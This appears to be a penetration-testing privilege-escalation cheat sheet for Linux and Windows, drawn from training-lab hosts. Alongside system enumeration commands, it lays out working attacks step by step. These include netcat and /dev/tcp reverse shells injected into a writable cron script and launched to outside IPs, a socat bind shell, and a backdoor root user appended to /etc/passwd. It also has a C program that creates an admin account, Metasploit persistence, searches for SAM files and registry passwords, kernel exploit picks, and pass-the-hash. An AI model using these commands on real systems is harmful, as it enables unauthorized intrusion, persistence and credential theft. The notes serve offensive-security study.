grep --binary-files=text -B 2 '99999:7' /dev/sda1
find / -maxdepth 2 -path '/proc' -prune -o -path '/dev' -prune -o -type f -exec grep "proof.txt" {} +
mkdir /tmp/mnt 2>/dev/null; docker run -v /:/tmp/mnt --rm -it alpine chroot /tmp/mnt sh
offsec@core:/dev/shm$ uname -a
Linux core 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
offsec@core:/dev/shm$ uname -r
2.6.32-21-generic-pae
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
https://gtfobins.github.io/ https://in.security/lin-security-walkthrough/
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
student@debian:~$ cat /etc/issue Debian GNU/Linux 9 \n \l
student@debian:~$ cat /etc/*-release PRETTY_NAME="Debian GNU/Linux 9 (stretch)" NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)" ID=debian
...
student@debian:~$ uname -a
Linux debian 4.9.0-6-686 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) i686 GNU/Linux
If any part of the SYSTEM %PATH% variable is writeable by Authenticated Users, privesc exists Many applications don't use full path
If system32 is not first entry in path this is bad
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
tasklist /SVC
wmic service where started=true get name, startname
$ ps aux
ipconfig /all
route print
netstat -ano
# to display all information add the 'a' argument
ip a
ifconfig a
/sbin/route
ss -anp
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
# list rules
iptables -L
# rule stored here
/etc/iptables
# binaries
iptables-save
iptables-restore
# Verbose argument /v
schtasks /query /fo LIST
schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskNam
schtasks /query /v /fo list /tn "\System Maintenance"
# system administrators often add their own scheduled tasks in /etc/crontab
/etc/crontab
/etc/cron/*
/etc/cron.daily
wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn
# Debian
dpkg -l
c:\Tools\privilege_escalation\SysinternalsSuite>accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -R ecurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
find / -writable -type d 2>/dev/null
#World writable files directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null
# World executable folder
find / -perm -o x -type d 2>/dev/null
# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
mountvol
mountvol c:\test \\?\Volume{93131ba8-0000-0000-0000-100000000000}\
cat /etc/fstab
mount
/bin/lsblk
powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Dis
play Name’, ‘Start Mode’, Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, D riverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
lsmod
/sbin/modinfo libata
If these are set we could run an msi to elevate privleges
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Insta ller
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
Search for SUID files
# For example, if /bin/cp (the copy command) were SUID, we could copy and overwrite sensitive files such as /etc/passwd.
find / -perm -u=s -type f 2>/dev/null
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
whoami
echo %USERNAME%
net user
net localgroup
users in a domain
net user /domain
net group /domain
net group /domain <Group Name>
netsh firewall show state
netsh firewall show config
ipconfig /all
route print
arp -A
schtasks /query /fo LIST /v
--copy output and save in txt
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
dir %SystemRoot%\Tasks
e.g. c:\windows\tasks\
e.g. c:\windows\system32\tasks\
Check service config can be modified or not
accesschk.exe /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -ucqv \<Service Name>
sc qc \<Service Name> -- Get service details
Check service with weak file permission
User c:\windows\temp\
wmic.exe
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
sc.exe
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
These may run as system and have overwriteable .exes
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"
Serviio Running C:\Program Files\Serviio\bin\ServiioService.exe
PS C:\Users\offsec.CLIENT251> icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
wmic service get name,displayname,pathname,startmode | findstr /i /v Windows | findstr /c:"" /v
https://pentestlab.blog/tag/privilege-escalation/page/3/
cmdkey /list << If there are entries, it means that we may able to runas certain user who stored his cred in windows
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"
Can we find any SAM files?
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /si pass/pwd *.ini
dir /s *pass* == *cred* == *vnc* == *.config*
in all files
findstr /spin "password" *.*
findstr /spin "password" *.*
Unattended? vnc?
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
accesschk.exe --accepteula -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Power Users" * /accepteula
icacls scsiaccess.exe -Check permissions on file (Look for W or F tag) and substitute if possible
subinacl /keyreg HKEY_LOCAL_MACHINE/software/microsoft
Write and compile malicious exe file to add a user to the system as an admin
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user evil Ev!lpass /add");
i = system ("net localgroup administrators evil /add");
return 0;
}
sudo i686-w64-mingw32-gcc adduser.c -o adduser.exe
wmic service where caption="Serviio" get name, caption, state, startmode
net localgroup Administrators
Special Permisions
SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. Instead of the normal x which represents execute permissions, you will see an s (to indicate SUID) special permission for the user.
find / -perm /4000
SGID is a special file permission that also applies to executable files and enables other users to inherit the effective GID of file group owner. Likewise, rather than the usual x which represents execute permissions, you will see an s (to indicate SGID) special permission for group user.
find / -perm /2000
To find files which have both SUID and SGID set, run the command below.
find / -perm /6000 -exec ls -ldb {} \;
find / -perm /6000 -type f -exec ls -ldb {} \;
find / -perm /6000 -type f -exec ls -ldb {} \; | grep -v denied > t.txt
# A setuid/setgid program with a vulnerability == priveseclation
# Look for buffer overrflow, format string vulns, insecure API usage, and logic flaws
# https://www.youtube.com/watch?v=yXe4X-AIbps&t=1668s
# 28:33
find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \;
find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \; | grep -v denied > a.txt
find / -perm -4000 -o -perm -2000 -type f -exec ls -ldb {} \; | grep -v denied > a.txt
# use ltrace to see program execution
# If a program doesn't use full path set current path you can make it run a program in you path
export PATH=.:#PATH
# Example the /bin/checkHost command doesn't use a full path for grep
#!/bin/dash
# save as ./grep
# chmod +755
cat /etc/shadow
# find files we can write to that are not symbolic links
find / -perm -2 ! -type l -ls 2>/dev/null
# find scripts we can write to that are not symbolic links
find / -perm -2 ! -type l -ls 2>/dev/null | grep sh
student@debian:~$ stat /var/scripts/user_backups.sh
File: /var/scripts/user_backups.sh
Size: 57 Blocks: 8 IO Block: 4096 regular file
Device: 801h/2049d Inode: 7606 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2020-04-08 06:40:01.163998782 -0400
Modify: 2020-03-10 05:59:52.931997540 -0400
Change: 2020-03-10 05:59:52.931997540 -0400
Birth: -
This assumes "user_backups.sh" is writable:
student@debian:/var/scripts$ echo >> user_backups.sh
student@debian:/var/scripts$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.152 1234 >/tmp/f" >> user_backups.sh
student@debian:/var/scripts$ cat user_backups.sh
#!/bin/bash
cp -rf /home/student/ /var/backups/student/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.152 1234 >/tmp/f
From your attacking host run this and wait for cron to execute:
nc -nlv 1234
student@debian:~$ openssl passwd password
YrnMnsTH1xTMg
student@debian:~$ echo "root2:YrnMnsTH1xTMg:0:0:root:/root:/bin/bash" >> /etc/passwd
student@debian:~$ su root2
# Password: password
root@debian:/home/student#
find -mtime 0 - find files tampered less then 24 hrs ago
touch --date "2013-01-01" /tmp/timestamp
find /var/log -type f -newer /tmp/timestamp
cat /etc/crontab
ls -la /lib/systemd/system/debug.service (https://in.security/lin-security-walkthrough/)
find / -perm -2 ! -type l -ls 2>/dev/null -Look for cron scripts, if any
find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \;
find / -perm -6000
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
find / -user flag00 2>/dev/null -Files being run under user
find /var/www/html -type d -perm -o+w - find writable dirs
find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null
sudo -l -Allowed to run
LESS, XXD, STRACE, TASKSET (https://gtfobins.github.io/)
SOCAT:
Bind shell: sudo socat TCP-LISTEN:9999,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
To connect: socat FILE:`tty`,raw,echo=0 TCP:192.168.114.142:9999
ssh--> sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk (also works for mawk)--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
ls -ahlR /home/; ls -ahlR /root/
/bin/bash -i >& /dev/tcp/10.11.0.76/443 0>&1 -Inject this reverse shell into cron script
dirty (40839.c ) - Linux 2.6.32, 2.6.22 (Linux 2.6.22 - 3.9) gcc -pthread 40839.c -o dirty -lcrypt
linux2421 - Linux 2.4.7(crashed)
9.0 (28718.c) - FreeBSD 9.0
centsos45 (9542.c) - CentOS 4.4 - 4.5 (Linux 2.6 - 2.6.19)
linux26 (5093.c) - Linux (2.6.23 - 2.6.24)
18411.c - Linux 2.6.39 < 3.2.2 (Ubuntu 11.10, kernel 3.0.0-12)
37292.c (ububtu) - ubuntu 14.04 (Linux 3.13 - 3.19)
https://github.com/danigargu/CVE-2020-0796
KiTrap0D (KB979682) use exploit/windows/local/ms10_015_kitrap0d
MS11-011 (KB2393802)
MS10-059 (KB982799) Churraskito.exe "C:\windows\system32\cmd.exe" "net user 123 123 /add"
MS10-021 (KB979683) MS office
MS11-080 (KB2592799) megacorp/exploits/windows-kernel-exploits/MS11-080
MS12-042 (KB2709715)
KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
run persistence -U -i 30 -p 443 -r 10.11.0.76
net user pronto prontissimo /add
net localgroup administrators pronto /add
net localgroup "Remote Desktop Users" pronto /add
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*
C:\Windows\system32> findstr /si password *.xml *.ini *.txt
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s
useradd -g 0 -s /bin/bash -m Tom -Linux (root group 0)
usermod -aG sudo Tom
adduser -FreeBSD
Client sideMS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution
MS12-037 (24017 html file) -Once run in IE8, listen 4444 wget -O exploit.html https://www.exploit-db.com/exploits/24017
wmic useraccount where (name='Guest') get name,sid
c:\Tools\privilege_escalation\windows-privesc-check-master>windows-privesc-check2.exe --dump -G
windows-privesc-check v2.0 (http://pentestmonkey.net/windows-privesc-check)
[i] TSUserEnabled registry value is 0. Excluding TERMINAL SERVER USER
Considering these users to be trusted: * BUILTIN\Power Users
* BUILTIN\Administrators
* NT SERVICE\TrustedInstaller
* NT AUTHORITY\SYSTEM
student@debian:~$./unix-privesc-check
unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )
Usage: unix-privesc-check { standard | detailed }
"standard" mode: Speed-optimised check of lots of security settings.
Use the NTLM hash to authenticate
pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2 eb3b9f05c425e //10.11.0.22 cmd